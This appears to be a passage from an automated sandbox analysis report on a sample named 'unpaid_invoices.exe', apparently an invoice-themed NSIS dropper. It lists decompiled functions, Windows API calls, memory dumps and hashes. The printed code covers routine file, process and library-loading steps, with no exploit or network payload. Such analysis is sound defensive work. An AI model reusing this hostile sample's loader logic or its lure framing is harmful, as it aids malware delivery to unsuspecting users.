              0x004015df
              0x004015e1
              0x004015e4
              0x004015ea
              0x00401604
              0x00401607
              0x004015ec
              0x004015ec
              0x004015ef
              0x00000000
              0x004015fa
              0x004015fd
              0x004015fd
              0x004015ef
              0x0040160e
              0x00401615
              0x00401624
              0x00401624
              0x00401617
              0x0040161a
              0x00401622
              0x00000000
              0x00000000
              0x00401622
              0x00401615
              0x00401627
              0x0040162b
              0x0040162c
              0x004015d7
              0x00401634
              0x00401663
              0x004022f1
              0x00401636
              0x00401638
              0x00401645
              0x0040164d
              0x00401655
              0x0040165b
              0x0040165b
              0x00401655
              0x00402c2d
              0x00402c39

              APIs
                • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
                • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 1892508949-47812868
              • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
              • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
              • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
              • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405D32 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 654 405d32-405d43 call 406139 657 405d73 654->657 658 405d45-405d4b 654->658 661 405d75-405d77 657->661 659 405d55 DeleteFileW 658->659 660 405d4d-405d53 RemoveDirectoryW 658->660 662 405d5b-405d5d 659->662 660->662 663 405d64-405d69 662->663 664 405d5f-405d62 662->664 663->657 665 405d6b-405d6d SetFileAttributesW 663->665 664->661 665->657
              C-Code - Quality: 41%
              			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406139(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






              0x00405d33
              0x00405d3e
              0x00405d43
              0x00405d73
              0x00000000
              0x00405d73
              0x00405d4a
              0x00405d4b
              0x00405d55
              0x00405d4d
              0x00405d4d
              0x00405d4d
              0x00405d5d
              0x00405d69
              0x00405d6d
              0x00405d6d
              0x00000000
              0x00405d5f
              0x00000000
              0x00405d61

              APIs
                • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
              • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$Attributes$DeleteDirectoryRemove
              • String ID:
              • API String ID: 1655745494-0
              • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
              • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
              • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
              • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406AE6 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 666 406ae6-406afe WaitForSingleObject 667 406b0e-406b10 666->667 668 406b00-406b0c call 406a77 WaitForSingleObject 667->668 669 406b12-406b25 GetExitCodeProcess 667->669 668->667
              C-Code - Quality: 100%
              			E00406AE6(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A77(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





              0x00406af7
              0x00406b0e
              0x00406b02
              0x00406b0c
              0x00406b0c
              0x00406b19
              0x00406b25

              APIs
              • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
              • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
              • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: ObjectSingleWait$CodeExitProcess
              • String ID:
              • API String ID: 2567322000-0
              • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
              • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
              • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
              • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
              Download Yara Rule
              C-Code - Quality: 53%
              			E00406045(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040666E(0x7a4790, _a4);
				_t21 = E00405FE8(0x7a4790);
				if(_t21 != 0) {
					E004068F5(_t21);
					if(( *0x7a8ab8 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4790 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4790);
							_push(0x7a4790);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004069A4();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F89(0x7a4790);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F3D();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









              0x00406051
              0x0040605c
              0x00406060
              0x00406067
              0x00406073
              0x00406083
              0x00406085
              0x0040609d
              0x0040609e
              0x004060a5
              0x004060a6
              0x00000000
              0x00000000
              0x00406089
              0x00406090
              0x00406098
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406090
              0x004060a8
              0x004060ae
              0x00000000
              0x004060bc
              0x00406075
              0x0040607b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040607b
              0x00406062
              0x00000000

              APIs
                • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
                • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
              • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 0040609E
              • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004060AE
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharNext$AttributesFilelstrcpynlstrlen
              • String ID:
              • API String ID: 3248276644-0
              • Opcode ID: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
              • Instruction ID: 38ed1c6f7611cbdad0e8a1dc3f16fb44af04154f1bcb09577380b12bcb23f66f
              • Opcode Fuzzy Hash: fa3c9235a4b418ee68dfdff8e4277a43b5875b963336551736dc5840a4575c34
              • Instruction Fuzzy Hash: 31F0282A148A5219D622B33A0D05ABF05458EC2354B0B063FFC53B12D1DF7C897385BF
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
              Download Yara Rule
              C-Code - Quality: 69%
              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7a8ad0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7a7a8c =  *0x7a7a8c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a8c, 0x7530,  *0x7a7a74), 0);
					}
				}
				return 0;
			}











              0x0040138a
              0x004013fa
              0x0040139b
              0x004013a0
              0x00000000
              0x00000000
              0x004013a2
              0x004013a3
              0x004013ad
              0x00000000
              0x00401404
              0x004013b0
              0x004013b7
              0x004013bd
              0x004013be
              0x004013c0
              0x004013c2
              0x004013b9
              0x004013b9
              0x004013ba
              0x004013ba
              0x004013c9
              0x004013cb
              0x004013f4
              0x004013f4
              0x004013c9
              0x00000000

              APIs
              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
              • Instruction ID: 0d0e525a89db022a3713d7d40a62d3a92fa7a1992dda9c0477917c3d4d329065
              • Opcode Fuzzy Hash: aa6623dc5ba143c6751f89f60c6741bc3c59239a488c9da53ae18f0a51eeece7
              • Instruction Fuzzy Hash: 5901F432624220ABE7094B389D05B2A3698E751315F10C67FF851F79F1EA78CC02DB4C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405C51 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405C51(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f90->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f90,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





              0x00405c5a
              0x00405c7a
              0x00405c82
              0x00405c87
              0x00000000
              0x00405c8d
              0x00405c91

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID:
              • API String ID: 3712363035-0
              • Opcode ID: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
              • Instruction ID: 1fa2a79eb519949bf7d30246b9e4481379e3d274eb9e55713eae969c2627164f
              • Opcode Fuzzy Hash: a96f74c6d97d8fddc601bdb2e7485f3ed7604f934fc57424aef617628e035306
              • Instruction Fuzzy Hash: 6AE0B6F4A00209BFEB00DFA4EE09F7B7AACEB44604F408525BD54F2191D7B9A8148A78
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406A3B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406A3B(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069CB(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





              0x00406a43
              0x00406a46
              0x00406a4d
              0x00406a55
              0x00406a61
              0x00000000
              0x00406a68
              0x00406a58
              0x00406a5f
              0x00000000
              0x00406a70
              0x00000000

              APIs
              • GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
              • GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                • Part of subcall function 004069CB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                • Part of subcall function 004069CB: wsprintfW.USER32 ref: 00406A1D
                • Part of subcall function 004069CB: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
              • Instruction ID: 8bc6c373ae4a51b79335f269ef4a09a4b84a1385f2c3991dd3566e210a560b2e
              • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
              • Instruction Fuzzy Hash: 56E0867660421066D610A6755D48D3773B89BC6710306843EF556F2040DB38DC359A6D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040615E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E0040615E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





              0x00406162
              0x0040616f
              0x00406184
              0x0040618a

              APIs
              • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00406162
              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.248541409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248557701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248564424.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248569044.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248819255.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248824140.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248829352.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248833606.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248843564.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248848212.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248853314.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248856925.00000000007BC000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248863093.00000000007C9000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.248870612.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406139(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
